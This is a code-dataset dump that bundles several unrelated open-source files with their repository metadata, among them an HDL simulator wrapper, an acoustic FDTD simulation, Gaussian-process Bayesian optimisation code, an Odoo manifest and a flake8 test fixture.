'{0!s}'.".format(vcomLogFile)) from ex # collecting all compile commands in a buffer recompileScriptContent += dedent("""\ puts " Compiling '{file}'..." {tcl} """).format( file=file.Path.as_posix(), tcl=vcom.GetTclCommand() ) recompileScriptContent += dedent("""\ puts "Recompilation done" puts "Restarting simulation..." restart -force puts "Simulation is restarted." """) recompileScriptContent = recompileScriptContent.replace("\\", "/") # WORKAROUND: to convert all paths to Tcl compatible paths. recompileScriptPath = self.Directories.Working / "recompile.do" self.LogDebug("Writing recompile script to '{0!s}'".format(recompileScriptPath)) with recompileScriptPath.open('w') as fileHandle: fileHandle.write(recompileScriptContent) def _RunSimulation(self, testbench): if (SimulationSteps.ShowWaveform in self._simulationSteps): return self._RunSimulationWithGUI(testbench) tclBatchFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimBatchScript'] tclDefaultBatchFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultBatchScript'] # create a QuestaSimulator instance vsim = self._toolChain.GetSimulator() vsim.Parameters[vsim.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix() # vsim.Parameters[vsim.FlagOptimization] = True # FIXME: vsim.Parameters[vsim.FlagReportAsError] = "3473" vsim.Parameters[vsim.SwitchTimeResolution] = "1fs" vsim.Parameters[vsim.FlagCommandLineMode] = True vsim.Parameters[vsim.SwitchTopLevel] = "{0}.{1}".format(VHDL_TESTBENCH_LIBRARY_NAME, testbench.ModuleName) # find a Tcl batch script for the BATCH mode vsimBatchCommand = "" if (tclBatchFilePath.exists()): self.LogDebug("Found Tcl script for BATCH mode: '{0!s}'".format(tclBatchFilePath)) vsimBatchCommand += "do {0};".format(tclBatchFilePath.as_posix()) elif (tclDefaultBatchFilePath.exists()): self.LogDebug("Falling back to default Tcl script for BATCH mode: '{0!s}'".format(tclDefaultBatchFilePath)) vsimBatchCommand += "do {0};".format(tclDefaultBatchFilePath.as_posix()) else: raise QuestaSimException("No Tcl batch script for BATCH mode found.") \ from FileNotFoundError(str(tclDefaultBatchFilePath)) vsim.Parameters[vsim.SwitchBatchCommand] = vsimBatchCommand testbench.Result = vsim.Simulate() def _RunSimulationWithGUI(self, testbench): tclGUIFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimGUIScript'] tclWaveFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimWaveScript'] tclDefaultGUIFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultGUIScript'] tclDefaultWaveFilePath = self.Host.Directories.Root / self.Host.PoCConfig[testbench.ConfigSectionName]['vSimDefaultWaveScript'] # create a QuestaSimulator instance vsim = self._toolChain.GetSimulator() vsim.Parameters[vsim.SwitchModelSimIniFile] = self._modelsimIniPath.as_posix() # vsim.Parameters[vsim.FlagOptimization] = True # FIXME: vsim.Parameters[vsim.FlagReportAsError] = "3473" vsim.Parameters[vsim.SwitchTimeResolution] = "1fs" vsim.Parameters[vsim.FlagGuiMode] = True vsim.Parameters[vsim.SwitchTopLevel] = "{0}.{1}".format(VHDL_TESTBENCH_LIBRARY_NAME, testbench.ModuleName) # vsim.Parameters[vsim.SwitchTitle] = testbenchName vsimDefaultWaveCommands = "add wave *" # find a Tcl batch script to load predefined signals in the waveform window vsimBatchCommand = "" self.LogDebug("'{0!s}'\n '{1!s}'".format(tclWaveFilePath, self.Host.Directories.Root)) if (tclWaveFilePath != self.Host.Directories.Root): if (tclWaveFilePath.exists()): self.LogDebug("Found waveform script: '{0!s}'".format(tclWaveFilePath)) vsimBatchCommand = "do {0};".format(tclWaveFilePath.as_posix()) elif (tclDefaultWaveFilePath != self.Host.Directories.Root): if (tclDefaultWaveFilePath.exists()): self.LogDebug("Found default waveform script: '{0!s}'".format(tclDefaultWaveFilePath)) vsimBatchCommand = "do {0};".format(tclDefaultWaveFilePath.as_posix()) else: self.LogDebug("Couldn't find default waveform script: '{0!s}'. Loading default command '{1}'.".format(tclDefaultWaveFilePath, vsimDefaultWaveCommands)) vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands) else: self.LogDebug("Couldn't find waveform script: '{0!s}'. Loading default command '{1}'.".format(tclWaveFilePath, vsimDefaultWaveCommands)) vsim.Parameters[vsim.SwitchBatchCommand] = "{0};".format(vsimDefaultWaveCommands) elif (tclDefaultWaveFilePath != self.Host.Directories.Root): if (tclDefaultWaveFilePath.exists()): self.LogDebug("Falling back to default waveform script: '{0!s}'".format(tclDefaultWaveFilePath)) vsimBatchCommand = "do {0};".format(tclDefaultWaveFilePath.as_posix()) else: self.LogDebug("Couldn't find default waveform script: '{0!s}'. Loading default command '{1}'.".format(tclDefaultWaveFilePath, vsimDefaultWaveCommands)) vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands) else: self.LogWarning("No waveform script specified. Loading default command '{1}'.".format(vsimDefaultWaveCommands)) vsimBatchCommand = "{0};".format(vsimDefaultWaveCommands) # find a Tcl batch script for the GUI mode vsimRunScript = "" if (tclGUIFilePath.exists()): self.LogDebug("Found Tcl script for GUI mode: '{0!s}'".format(tclGUIFilePath)) vsimRunScript = tclGUIFilePath.as_posix() vsimBatchCommand += "do {0};".format(vsimRunScript) elif (tclDefaultGUIFilePath.exists()): self.LogDebug("Falling back to default Tcl script for GUI mode: '{0!s}'".format(tclDefaultGUIFilePath)) vsimRunScript = tclDefaultGUIFilePath.as_posix() vsimBatchCommand += "do {0};".format(vsimRunScript) else: raise QuestaSimException("No Tcl batch script for GUI mode found.") \ from FileNotFoundError(str(tclDefaultGUIFilePath)) vsim.Parameters[vsim.SwitchBatchCommand] = vsimBatchCommand # writing a relaunch file recompileScriptPath = self.Directories.Working / "recompile.do" relaunchScriptPath = self.Directories.Working / "relaunch.do" saveWaveformScriptPath = self.Directories.Working / "saveWaveform.do" relaunchScriptContent = dedent("""\ puts "Loading recompile script '{recompileScript}'..." do {recompileScript} puts "Loading run script '{runScript}'..." do {runScript} """).format( recompileScript=recompileScriptPath.as_posix(), runScript=vsimRunScript ) self.LogDebug("Writing relaunch script to '{0!s}'".format(relaunchScriptPath)) with relaunchScriptPath.open('w') as fileHandle: fileHandle.write(relaunchScriptContent) # writing a saveWaveform file saveWaveformScriptContent = dedent("""\ puts "Saving waveform settings to '{waveformFile}'..." write format wave -window .main_pane.wave.interior.cs.body.pw.wf {waveformFile} """).format( waveformFile=tclWaveFilePath.as_posix() ) self.LogDebug("Writing saveWaveform script to '{0!s}'".format(saveWaveformScriptPath)) with saveWaveformScriptPath.open('w') as fileHandle: fileHandle.write(saveWaveformScriptContent) testbench.Result = vsim.Simulate()
11,506
236
23
af19a1538ffdc439b60f50fdf727d12a925a93f3
128
py
Python
yc228/908.py
c-yan/yukicoder
cdbbd65402177225dd989df7fe01f67908484a69
[ "MIT" ]
null
null
null
yc228/908.py
c-yan/yukicoder
cdbbd65402177225dd989df7fe01f67908484a69
[ "MIT" ]
null
null
null
yc228/908.py
c-yan/yukicoder
cdbbd65402177225dd989df7fe01f67908484a69
[ "MIT" ]
null
null
null
S = input() if all(c == ' ' for c in S[1::2]) and all('a' <= c <= 'z' for c in S[::2]): print('Yes') else: print('No')
18.285714
75
0.445313
S = input() if all(c == ' ' for c in S[1::2]) and all('a' <= c <= 'z' for c in S[::2]): print('Yes') else: print('No')
0
0
0
7b6e6c533e62117ccdb9f1743db9f70ee1c32542
5,070
py
Python
2dacousti_fdtd.py
dhufe/2d_ftdt_acoustics
062ff13399cc3b9db360e047bd1deb7c0e209397
[ "MIT" ]
null
null
null
2dacousti_fdtd.py
dhufe/2d_ftdt_acoustics
062ff13399cc3b9db360e047bd1deb7c0e209397
[ "MIT" ]
null
null
null
2dacousti_fdtd.py
dhufe/2d_ftdt_acoustics
062ff13399cc3b9db360e047bd1deb7c0e209397
[ "MIT" ]
null
null
null
# # # # # import numpy as np import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import matplotlib.animation as animation ## Computing grid and resolutions # Grid size x-direction NX = 500 # Grid size y-direction NY = 500 ## Properties of the acoustic excitation # Frequency freq = 60.0e3 # Hz # wave speed cmax = 343 # m/s # wave length lamda = cmax / freq # Spatial resolution # spatial stability critria: dx must be smaller or equal than lambda_min / 20 # where lambda_min is the shortest wavelength in the model! dx = lamda/40 #.01 # Time domain resolution # time stability criteria: dt must be smaller or equal than dx / ( sqrt(2) * c_max ) # where c_max is the highest wave speed in the model! dt = dx/(cmax*np.sqrt(2) ) # 20.0e-6 # mesh grid x = np.arange ( 0, (NX)*dx, dx ) y = np.arange ( 0, (NY)*dx, dx ) xx, yy = np.meshgrid( y, x ) ## Properties of the fluid like density and viscosity # Density rho = 1.241 # Bulk viscosity: c^2 x rho kappa = np.power(cmax, 2.0) * rho #142.0e3 ## Computing magnitutes for two dimensional particle velocity and pressure Vx = np.zeros ( ( NX + 1, NY ) ) Vy = np.zeros ( ( NX , NY + 1 ) ) P = np.zeros ( ( NX , NY ) ) NFrames = 3000 SourceWidth = 20 SourceHeight = 10 # setup indices ind = np.full(( NX, NY), False, dtype=bool) # setup indices ind = np.full(( NX, NY), False, dtype=bool) Pmx = int(np.floor(NX/4 - 10 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(NX/2 - 10 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(3*NX/4 - 10 + 1 )) Pmy = int(np.floor( NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(NX - 30 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) # Pxs = int(np.floor(NX/2 - SourceWidth/2 + 1 )) # Pxe = int(np.floor(NX/2 + SourceWidth/2 + 1 )) # Pys = int(np.floor(NY/2 - SourceHeight/2 + 1 )) # Pye = int(np.floor(NY/2 + SourceHeight/2 + 1 )) # ind[ Pxs:Pxe, Pys:Pys ] = True ## Visual stuff # Colormap colormap = 'RdBu' # Plot creation fig = plt.figure(figsize=(12.8, 7.2)) ax = fig.add_subplot(1,1,1) cax = ax.pcolormesh( xx, yy, P, vmin=-1, vmax=1, cmap=colormap) ax.set_xlabel ( r'Position $x$ / $m$' ) ax.set_ylabel ( r'Position $y$ / $m$' ) ax.set_xlim ( y[0], y[-1] ) ax.set_ylim ( x[0], x[-1] ) fig.colorbar(cax) fig.tight_layout() image_step = 400 ## help variables dt_over_rho_x_dx = dt / ( rho * dx ) kappa_x_dt_over_dx = kappa * dt / dx print ( 'Spatial stepsize %00.3f mm.' % ( dx*1e3 ) ) print ( 'Time stepsize %00.3f us.' % ( dt*1e6 ) ) print ( 'Volume elasticity %03.3f .' % ( kappa*1e-3 ) ) print ( 'Pulse width %d ' % ( int((1.0/freq)/dt) ) ) n = 0 anim = animation.FuncAnimation(fig, updatefig, frames=NFrames-1,interval=image_step, blit=True) anim Writer = animation.writers['ffmpeg'] writer = Writer ( fps=100, metadata=dict(artist='dkotscha' ), bitrate=6000) anim.save('ftdt_acoustic_one_source_2d.mp4', writer=writer ) plt.close()
25.477387
99
0.559369
# # # # # import numpy as np import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import matplotlib.animation as animation def circle(indices, xm, ym, r): x = r - 1 y = 0 dx = 1 dy = 1 err = dx - (r * 2) while ( x >= y): indices [ xm + x , ym + y] = True indices [ xm + y , ym + x] = True indices [ xm - y , ym + x] = True indices [ xm - x , ym + y] = True indices [ xm - x , ym - y] = True indices [ xm - y , ym - x] = True indices [ xm + y , ym - x] = True indices [ xm + x , ym - y] = True if err <= 0: y+=1 err += dy dy += 2 if err > 0: x-=1 dy += 2 err += dx - ( 2*r ) ## Computing grid and resolutions # Grid size x-direction NX = 500 # Grid size y-direction NY = 500 ## Properties of the acoustic excitation # Frequency freq = 60.0e3 # Hz # wave speed cmax = 343 # m/s # wave length lamda = cmax / freq # Spatial resolution # spatial stability critria: dx must be smaller or equal than lambda_min / 20 # where lambda_min is the shortest wavelength in the model! dx = lamda/40 #.01 # Time domain resolution # time stability criteria: dt must be smaller or equal than dx / ( sqrt(2) * c_max ) # where c_max is the highest wave speed in the model! dt = dx/(cmax*np.sqrt(2) ) # 20.0e-6 # mesh grid x = np.arange ( 0, (NX)*dx, dx ) y = np.arange ( 0, (NY)*dx, dx ) xx, yy = np.meshgrid( y, x ) ## Properties of the fluid like density and viscosity # Density rho = 1.241 # Bulk viscosity: c^2 x rho kappa = np.power(cmax, 2.0) * rho #142.0e3 ## Computing magnitutes for two dimensional particle velocity and pressure Vx = np.zeros ( ( NX + 1, NY ) ) Vy = np.zeros ( ( NX , NY + 1 ) ) P = np.zeros ( ( NX , NY ) ) NFrames = 3000 SourceWidth = 20 SourceHeight = 10 # setup indices ind = np.full(( NX, NY), False, dtype=bool) # setup indices ind = np.full(( NX, NY), False, dtype=bool) Pmx = int(np.floor(NX/4 - 10 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(NX/2 - 10 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(3*NX/4 - 10 + 1 )) Pmy = int(np.floor( NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) Pmx = int(np.floor(NX - 30 + 1 )) Pmy = int(np.floor(NY/2 + 1 )) circle ( ind, Pmx, Pmy, 20 ) # Pxs = int(np.floor(NX/2 - SourceWidth/2 + 1 )) # Pxe = int(np.floor(NX/2 + SourceWidth/2 + 1 )) # Pys = int(np.floor(NY/2 - SourceHeight/2 + 1 )) # Pye = int(np.floor(NY/2 + SourceHeight/2 + 1 )) # ind[ Pxs:Pxe, Pys:Pys ] = True ## Visual stuff # Colormap colormap = 'RdBu' # Plot creation fig = plt.figure(figsize=(12.8, 7.2)) ax = fig.add_subplot(1,1,1) cax = ax.pcolormesh( xx, yy, P, vmin=-1, vmax=1, cmap=colormap) ax.set_xlabel ( r'Position $x$ / $m$' ) ax.set_ylabel ( r'Position $y$ / $m$' ) ax.set_xlim ( y[0], y[-1] ) ax.set_ylim ( x[0], x[-1] ) fig.colorbar(cax) fig.tight_layout() image_step = 400 ## help variables dt_over_rho_x_dx = dt / ( rho * dx ) kappa_x_dt_over_dx = kappa * dt / dx print ( 'Spatial stepsize %00.3f mm.' % ( dx*1e3 ) ) print ( 'Time stepsize %00.3f us.' % ( dt*1e6 ) ) print ( 'Volume elasticity %03.3f .' % ( kappa*1e-3 ) ) print ( 'Pulse width %d ' % ( int((1.0/freq)/dt) ) ) n = 0 def updatefig (n): # Updating particle velocities for i in range (2,NX): for j in range ( 1, NY ): Vx[i,j] -= dt_over_rho_x_dx * ( P[i,j] - P[i-1,j] ) for i in range (1,NX): for j in range ( 2, NY): Vy[i,j] -= dt_over_rho_x_dx * ( P[i,j] - P[i,j-1] ) # Update sound pressure for i in range (1, NX): for j in range (1,NY): P[i,j] -= ( ( Vx[i+1,j] - Vx[i,j] ) + ( Vy[i,j+1] - Vy[i,j] ) ) # Acoustic source ( during one period) if (n < (1.0/freq)/dt): P[ ind ] += .33*(1.0-np.cos(2.0*np.pi*freq*n*dt))/2.0 * np.sin(2.0*np.pi*freq*n*dt) if (n < (1.0/(.5*freq))/dt): P[ ind ] += .33*(1.0-np.cos(2.0*np.pi*.5*freq*n*dt))/2.0 * np.sin(2.0*np.pi*.5*freq*n*dt) if (n < (1.0/(.25*freq))/dt): P[ ind ] += .33*(1.0-np.cos(2.0*np.pi*.25*freq*n*dt))/2.0 * np.sin(2.0*np.pi*.25*freq*n*dt) if (( n + 1 ) % 100 == 1) or ( n == 0): print ( '--- processing step %03d ---' % ( n )) # Updating the current calculation step n += 1 # Updating data cax.set_array ( P.flatten() ) #cax2.set_array ( np.abs(P).flatten() ) #ax.set_title("circular membrane: l={}, m={}-Mode".format(l+1,m)) ax.set_title("Time step {} ms".format( int((n*dt*1e3*10))/10.0 ) ) #ax[1].set_title("Time step {} ms".format( int((n*dt*1e3*10))/10.0 ) ) return cax, anim = animation.FuncAnimation(fig, updatefig, frames=NFrames-1,interval=image_step, blit=True) anim Writer = animation.writers['ffmpeg'] writer = Writer ( fps=100, metadata=dict(artist='dkotscha' ), bitrate=6000) anim.save('ftdt_acoustic_one_source_2d.mp4', writer=writer ) plt.close()
1,979
0
46
ddbe5d981cc7c179c7df3962dd94212f2262bf54
629
py
Python
MOnewUser/env/lib/python3.8/site-packages/eth_hash/abc.py
julio-cesar-leitao/PGP-PKI
9bdeb4606534d6dacba8356b223a20e204399d32
[ "MIT" ]
68
2018-02-08T20:46:16.000Z
2022-03-18T19:36:09.000Z
MOnewUser/env/lib/python3.8/site-packages/eth_hash/abc.py
julio-cesar-leitao/PGP-PKI
9bdeb4606534d6dacba8356b223a20e204399d32
[ "MIT" ]
21
2018-02-07T20:45:06.000Z
2021-09-24T19:57:52.000Z
MOnewUser/env/lib/python3.8/site-packages/eth_hash/abc.py
julio-cesar-leitao/PGP-PKI
9bdeb4606534d6dacba8356b223a20e204399d32
[ "MIT" ]
46
2018-02-08T15:15:40.000Z
2022-03-28T18:49:32.000Z
from abc import ( ABC, abstractmethod, ) from typing import ( Union, )
17.472222
72
0.583466
from abc import ( ABC, abstractmethod, ) from typing import ( Union, ) class PreImageAPI(ABC): @abstractmethod def __init__(self, value: bytes) -> None: ... @abstractmethod def update(self, value: bytes) -> None: ... @abstractmethod def digest(self) -> bytes: ... @abstractmethod def copy(self) -> 'PreImageAPI': ... class BackendAPI(ABC): @abstractmethod def keccak256(self, in_data: Union[bytearray, bytes]) -> bytes: ... @abstractmethod def preimage(self, in_data: Union[bytearray, bytes]) -> PreImageAPI: ...
215
283
46
ef3d6bc838bd24e2609fe5471781cac8f97d2759
12,070
py
Python
GP_model.py
JixiangChen-Jimmy/DMEA
886ca864fa6b2f51867688035870f1ec344d1090
[ "MIT" ]
null
null
null
GP_model.py
JixiangChen-Jimmy/DMEA
886ca864fa6b2f51867688035870f1ec344d1090
[ "MIT" ]
null
null
null
GP_model.py
JixiangChen-Jimmy/DMEA
886ca864fa6b2f51867688035870f1ec344d1090
[ "MIT" ]
null
null
null
import GPy from GPyOpt.util.general import get_quantiles import GPyOpt import numpy as np from math import pow, log, sqrt import pandas as pd # train_x : history x # train_y : history y # num_init : The number of initial sample points # lsx : the collected x in last round # lsy : the text function value corresponding to the collected x in last round # P : Represents the historical confidence level of the acquisition functions in acquisition library # domain : refer to the information of the variable of BayesianOptimization called by GPyOpt # f : refer to the optimization objectives information of BayesianOptimization called by GPyOpt # num_obj : The selected number of acquisition functions that build up multi-objective optimization. # eta is a hyperparameters
43.731884
121
0.505965
import GPy from GPyOpt.util.general import get_quantiles import GPyOpt import numpy as np from math import pow, log, sqrt import pandas as pd # train_x : history x # train_y : history y # num_init : The number of initial sample points # lsx : the collected x in last round # lsy : the text function value corresponding to the collected x in last round # P : Represents the historical confidence level of the acquisition functions in acquisition library # domain : refer to the information of the variable of BayesianOptimization called by GPyOpt # f : refer to the optimization objectives information of BayesianOptimization called by GPyOpt # num_obj : The selected number of acquisition functions that build up multi-objective optimization. # eta is a hyperparameters class GP: def __init__(self, iter, train_x, train_y, exx, exy, k, num_init, lsx, lsy, P, f, domain, model, eta=0.9): self.train_x = train_x.copy() self.train_y = train_y.copy() self.mean = np.mean(exy) self.std = np.std(exy) self.num_train = exx.shape[0] self.lsx = lsx.copy() self.lsy = lsy.copy() self.exx = exx.copy() self.exy = exy.copy() self.dim = self.exx.shape[1] self.k = k self.num_init = num_init self.P = P self.eta = eta self.domain = domain self.f = f self.iter = iter self.m = model self.tau = np.min(train_y) self.burnin = 200 self.n_samples = 10 self.subsample_interval = 10 self.sample() self.update() self.mean = np.mean(train_y) self.std = np.std(train_y) self.train_y = (train_y.copy() - self.mean) / self.std self.num_train = train_x.shape[0] kern = GPy.kern.Matern52(input_dim=self.dim, ARD=True) self.m = GPy.models.GPRegression(self.train_x, self.train_y, kern, noise_var=0) def update(self): tx = self.train_x.tolist() ty = self.train_y.ravel().tolist() lsy = self.lsy.ravel().tolist() self.lsbesty = np.min(self.exy) history_data = pd.DataFrame({'x': tx, 'y': ty}) history_data.sort_values(by='y', ascending=True, inplace=True) history_data.reset_index(drop=True, inplace=True) self.rank = [] self.hq_x = [] self.phi_alpha = [] alpha = 3 for i in lsy: if len(history_data.index[history_data['y'] < i]) > 0: self.rank.append(history_data.index[history_data['y'] < i][-1] + 1) else: self.rank.append(0) if self.rank[-1] <= int(alpha): self.hq_x.append(1) else: self.hq_x.append(0) self.phii = self.hq_x self.rank = np.array(self.rank) self.hq_x = np.array(self.hq_x) # Stores information about the collection library self.acqusition_type = ['MPI', 'EI', 'LCB', 'LCB', 'LCB', 'LCB', 'LCB'] self.hyperpara = [0.001, 0.001, [0.5, 0.5], [0.5, 0.05], [5, 0.1], [10, 0.1], [30, 0.1]] # LP_recommend_num is the regarding threshold of recommended number when using LP-alpha(x) acquisition functions # beta is equal to 0.5 LP_recommend_num = int(0.5 * self.k) # k / 2 current_P = [] for i in range(len(self.acqusition_type)): if self.acqusition_type[i] == 'LCB': self.set_kappa(self.hyperpara[i][0], self.hyperpara[i][1]) LP_checker = GPyOpt.methods.BayesianOptimization(f=self.f, domain=self.domain, acquisition_type=self.acqusition_type[i], normalize_Y=True, X=self.exx, Y=self.exy, evaluator_type='local_penalization', batch_size=LP_recommend_num, acquisition_weight=self.kappa) else: LP_checker = GPyOpt.methods.BayesianOptimization(f=self.f, domain=self.domain, acquisition_type=self.acqusition_type[i], normalize_Y=True, X=self.exx, Y=self.exy, evaluator_type='local_penalization', batch_size=LP_recommend_num, acquisition_jitter=self.hyperpara[i]) LP_checker.run_optimization(max_iter=1) LP_acq_x = LP_checker.suggested_sample # acq_recommend_bound is the threshold at which the acquisition function recommends the sample points or not acq_recommend_bound = np.inf for x in LP_acq_x: pys, pss = self.predict(x) if self.acqusition_type[i] == 'LCB': acq_calc = -self.LCB(pys, pss) elif self.acqusition_type[i] == 'MPI': acq_calc = self.PI(pys, pss, self.hyperpara[i]) else: acq_calc = self.EI(pys, pss, self.hyperpara[i]) if acq_calc < acq_recommend_bound: acq_recommend_bound = acq_calc # acq_val is the value of the acquisition function # under the current acquisition function of the previous round of sampling points acq_val = [] phi_alpha = [] for x in self.lsx: pys, pss = self.predict(x) if self.acqusition_type[i] == 'LCB': acq_calc = -self.LCB(pys, pss) elif self.acqusition_type[i] == 'MPI': acq_calc = self.PI(pys, pss, self.hyperpara[i]) else: acq_calc = self.EI(pys, pss, self.hyperpara[i]) acq_val.append(acq_calc) if acq_calc >= acq_recommend_bound - 1e-7: phi_alpha.append(1) else: phi_alpha.append(0) phi_alpha = np.array(phi_alpha) self.phi_alpha.append(phi_alpha.tolist()) # cp is used to calculate the penalty value of current acquisition function cp = 0 for i in range(self.lsx.shape[0]): cp += abs(self.hq_x[i] - phi_alpha[i]) * abs(self.lsbesty - lsy[i]) if self.hq_x[i] == 1 and phi_alpha[i] == 1: cp += lsy[i] - self.lsbesty current_P.append(cp) current_P = np.array(current_P) # self.CP is a comprehensive information that synthesizes the historical penalty value of acquisition functions # and the penalty value obtained by the previous round of sampling points, # and needs to be stored by calling the main function self.CP = self.eta * self.P + current_P df_CP = pd.DataFrame({'cp': self.CP.tolist()}) # self.current_choice stores the subscripts of the num_obj acquisition functions selected in the acquisition # function library. # self.confidence returns the confidence level obtained by recombining the penalty value of the selected # acquisition functions in the current round, which is a one-dimensional ndarray # num_obj : The number of selected acquisition functions that build up multi-objective optimization # num_obj is equal to 3 self.current_choice = df_CP.index[df_CP['cp'].rank(method='first') - 3 < 1e-3].tolist() self.T = [] minn = np.min(self.CP) for i in self.current_choice: self.T.append(self.CP[i]) self.T = np.array(self.T) self.T = (self.T + 1e-4) / np.sum((self.T + 1e-4)) def sample(self): self.m.optimize_restarts(num_restarts=10) if not 0: self.s = np.array(np.array(self.m[:])) self.s = self.s.reshape(1, self.s.size) self.ms = np.array([self.m]) else: hmc = GPy.inference.mcmc.HMC(self.m, stepsize=5e-2) s = hmc.sample(num_samples=self.n_samples * self.subsample_interval) self.s = s[0::self.subsample_interval] self.ms = [] for i in range(self.s.shape[0]): samp_kern = GPy.kern.Matern52(input_dim=self.dim, ARD=True) samp_m = GPy.models.GPRegression(self.train_x, self.train_y, samp_kern) samp_m[:] = self.s[i] samp_m.parameters_changed() self.ms = np.append(self.ms, samp_m) def predict_sample(self, x, hyp_vec): self.m.kern.variance = hyp_vec[0] self.m.kern.lengthscale = hyp_vec[1:1 + self.dim] self.m.likelihood.variance = hyp_vec[1 + self.dim] py, ps2 = self.m.predict(x.reshape(1, x.size)) py = self.mean + (py * self.std) ps2 = ps2 * (self.std ** 2) return py, ps2 def set_kappa(self, upsilon, delta): num_train = self.num_train t = 1 + max(int((num_train - self.num_init) / self.k), 0) self.kappa = sqrt( upsilon * 2 * log(pow(t, 2.0 + self.dim / 2.0) * 3 * pow(np.pi, 2) / (3 * delta))) # kappa of LCB def predict(self, x): num_samples = self.s.shape[0] pys = np.zeros((num_samples, 1)) pss = np.zeros((num_samples, 1)) for i in range(num_samples): m, v = self.ms[i].predict(x.reshape(1, x.size)) pys[i] = m[0][0] pss[i] = v[0][0] pys = self.mean + (pys * self.std) pss = pss * (self.std ** 2) return pys, np.sqrt(pss) def LCB(self, pys, pss): num_samples = pys.shape[0] acq = 0 for i in range(num_samples): y = pys[i] s = pss[i] lcb = y - self.kappa * s acq += lcb acq /= self.s.shape[0] return acq def EI(self, pys, pss, eps): num_samples = pys.shape[0] acq = 0 for i in range(num_samples): y = pys[i] s = pss[i] phi, Phi, u = get_quantiles(eps, self.tau, y, s) f_acqu = s * (u * Phi + phi) acq += f_acqu acq /= self.s.shape[0] return acq def PI(self, pys, pss, eps): num_samples = pys.shape[0] acq = 0 for i in range(num_samples): y = pys[i] s = pss[i] _, Phi, _ = get_quantiles(eps, self.tau, y, s) f_acqu = Phi acq += f_acqu acq /= self.s.shape[0] return acq def MACE_acq(self, x): pys, pss = self.predict(x) list = [] for i in self.current_choice: if self.acqusition_type[i] == 'LCB': self.set_kappa(self.hyperpara[i][0], self.hyperpara[i][1]) lcb = self.LCB(pys, pss) list.append([lcb, 0]) elif self.acqusition_type[i] == 'MPI': pi = self.PI(pys, pss, self.hyperpara[i]) list.append([pi, 1]) else: ei = self.EI(pys, pss, self.hyperpara[i]) list.append([ei, 1]) return list
10,980
-12
312
ddb0483295a6a1a976fc5fd283466768897fe4c3
350
py
Python
definition_theme/__manifest__.py
talway/OdooERPApp
2c44baa8ad020550098e18e630dbc57d3927d1ca
[ "Apache-2.0" ]
null
null
null
definition_theme/__manifest__.py
talway/OdooERPApp
2c44baa8ad020550098e18e630dbc57d3927d1ca
[ "Apache-2.0" ]
null
null
null
definition_theme/__manifest__.py
talway/OdooERPApp
2c44baa8ad020550098e18e630dbc57d3927d1ca
[ "Apache-2.0" ]
2
2019-11-11T12:34:03.000Z
2020-09-21T07:25:41.000Z
# -*- coding: utf-8 -*- { 'name': "自定义主题界面风格", 'summary': """自定义界面风格模块""", 'description': """用以自定义Odoo界面风格的模块""", 'author': "SuXueFeng", 'website': "https://www.sxfblog.com", 'category': 'style', 'version': '0.1', 'depends': ['base'], 'data': [ 'views/WebAssetsBackend.xml', ], 'demo': [ ], }
19.444444
42
0.488571
# -*- coding: utf-8 -*- { 'name': "自定义主题界面风格", 'summary': """自定义界面风格模块""", 'description': """用以自定义Odoo界面风格的模块""", 'author': "SuXueFeng", 'website': "https://www.sxfblog.com", 'category': 'style', 'version': '0.1', 'depends': ['base'], 'data': [ 'views/WebAssetsBackend.xml', ], 'demo': [ ], }
0
0
0
4e7b9e9936d24d03c5bc95bfa26b6063c5eacaab
195
py
Python
tests/run_flake8/noerror.py
10sr/flake8-no-implicit-concat
11db2327ffc122d9481c6e03a77cf62b1dc85d25
[ "MIT" ]
15
2020-05-21T19:39:58.000Z
2022-03-22T11:04:12.000Z
tests/run_flake8/noerror.py
10sr/flake8-no-implicit-concat
11db2327ffc122d9481c6e03a77cf62b1dc85d25
[ "MIT" ]
43
2020-05-20T05:19:20.000Z
2021-11-25T05:34:51.000Z
tests/run_flake8/noerror.py
10sr/flake8-no-implicit-concat
11db2327ffc122d9481c6e03a77cf62b1dc85d25
[ "MIT" ]
1
2020-08-25T23:04:08.000Z
2020-08-25T23:04:08.000Z
a = "aaa" b = "bbb" + "ccc" d = """ddd eee fff""" + "ggg" l = ["hhh", "iii" + "jjj"] noqa = "k" "l" # noqa: NIC001 noqa = ("k" # noqa: NIC002 "l") print("abc" + "def", "ghi")
15
30
0.410256
a = "aaa" b = "bbb" + "ccc" d = """ddd eee fff""" + "ggg" l = ["hhh", "iii" + "jjj"] noqa = "k" "l" # noqa: NIC001 noqa = ("k" # noqa: NIC002 "l") print("abc" + "def", "ghi")
0
0
0
67bca61bcc5eccb73a28567b84e02d4c1c3a79b7
1,786
py
Python
bookmark_website/bookmark_app/migrations/0001_initial.py
thejeshpr/bookmarks
eff748c0e7a6e3d211d3e87b25ffefca612726ce
[ "MIT" ]
null
null
null
bookmark_website/bookmark_app/migrations/0001_initial.py
thejeshpr/bookmarks
eff748c0e7a6e3d211d3e87b25ffefca612726ce
[ "MIT" ]
null
null
null
bookmark_website/bookmark_app/migrations/0001_initial.py
thejeshpr/bookmarks
eff748c0e7a6e3d211d3e87b25ffefca612726ce
[ "MIT" ]
null
null
null
# Generated by Django 2.2.7 on 2019-11-18 16:44 from django.db import migrations, models import django.db.models.deletion
42.52381
169
0.595185
